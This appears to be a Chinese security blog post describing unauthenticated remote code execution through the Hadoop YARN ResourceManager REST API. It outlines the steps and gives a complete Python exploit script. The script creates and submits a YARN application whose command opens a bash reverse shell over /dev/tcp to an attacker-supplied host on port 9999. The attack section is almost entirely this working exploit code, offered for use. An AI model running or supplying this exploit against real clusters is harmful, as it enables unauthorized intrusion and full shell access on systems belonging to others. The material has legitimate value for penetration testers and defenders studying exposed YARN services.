Hadoop YARN ResourceManager 未授权访问


Hadoop YARN ResourceManager 未授权访问

漏洞利用

利用方法和原理中有一些不同。在没有 hadoop client 的情况下,直接通过 REST API (https://hadoop.apache.org/docs/r2.7.3/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html) 也可以提交任务执行。

利用过程如下:

  1. 在本地监听等待反弹 shell 连接
  2. 调用 New Application API 创建 Application
  3. 调用 Submit Application API 提交

exp 脚本

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

反弹shell


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Gogs 任意用户登录漏洞 Gogs 任意用户登录漏洞
Gogs 任意用户登录漏洞(CVE-2018-18925)gogs是一款极易搭建的自助Git服务平台,具有易安装、跨平台、轻量级等特点,使用者众多。 其0.11.66及以前版本中,(go-macaron/session库)没有对sessio
2019-02-19
下一篇 
GoAhead 远程命令执行漏洞 GoAhead 远程命令执行漏洞
GoAhead 远程命令执行漏洞(CVE-2017-17562)GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的
2019-02-18
  目录